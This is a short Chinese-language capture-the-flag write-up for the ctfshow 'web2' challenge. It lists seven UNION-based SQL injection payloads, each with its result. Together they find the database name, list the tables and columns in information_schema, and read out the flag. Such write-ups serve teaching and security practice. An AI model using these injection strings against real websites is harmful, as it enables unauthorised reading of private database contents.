当前位置: 首页 > article >正文

ctfshow WEB web2

article 2025/4/1 0:41:24

1.查当前数据库名称

' or 1=1 union select 1,database(),3 limit 1,2;#--

得到数据库名称web2

2.查看数据库表的数量

' or 1=1 union select 1,(select count(*) from information_schema.tables where table_schema = 'web2'),3 limit 1,2;#--

得到数据库表数量为2

3.查表的名字

第一个表:

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 0,1),3 limit 1,2;#--

得到表名:flag

第二个表:

' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema = 'web2' limit 1,2),3 limit 1,2;#--

得到表名:user

4.查flag表列的数量

' or 1=1 union select 1,(select count(*) from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#--

只有1列

5.查flag表列的名字

' or 1=1 union select 1,(select column_name from information_schema.columns where table_name = 'flag' limit 0,1),3 limit 1,2;#--

列名为flag

6.查flag表记录的数量

' or 1=1 union select 1,(select count(*) from flag),3 limit 1,2;#--

只有一条记录

7.查flag表记录值

' or 1=1 union select 1,(select flag from flag limit 0,1),3 limit 1,2;#--

得到flag

ctfshow{51b20b81-54c6-4f40-aa4c-feeefcf250fc}

http://www.kler.cn/a/599968.html

相关文章:

  • Proximal Policy Optimization(PPO)算法
  • 中信银行太原长治路支行赴老年活动服务中心开展专题金融知识宣讲
  • Jackson实现JSON数据的合并
  • 【GoLang】调用llm时提示词prompt的介绍以及使用方式
  • 信奥赛CSP-J复赛集训(模拟算法专题)(31):P2692 覆盖
  • Rust语言的无服务器架构
  • Leetcode-100 贪心算法
  • 【40】单片机编程核心技巧:static 的重要作用
  • 组件日志——etcd
  • 山东电专--自动化刷课
  • 前缀树学习
  • 深入理解 HTML5 Web Workers:提升网页性能的关键技术解析
  • NO.56|基础算法-模拟|多项式输出|蛇形方阵|字符串的展开|方向向量(C++)
  • 《HarmonyOS Next自定义TabBar页签凸起和凹陷案例与代码》
  • 蓝桥杯—草坪(模拟+bfs分层处理)
  • 【计算机网络运输层详解】
  • 常见框架漏洞—Spring
  • 深度学习篇---PaddleDetectionPaddleOCR
  • 《AI大模型趣味实战 》第7集:多端适配 个人新闻头条 基于大模型和RSS聚合打造个人新闻电台(Flask WEB版) 1
  • Spring Boot - 动态编译 Java 类并实现热加载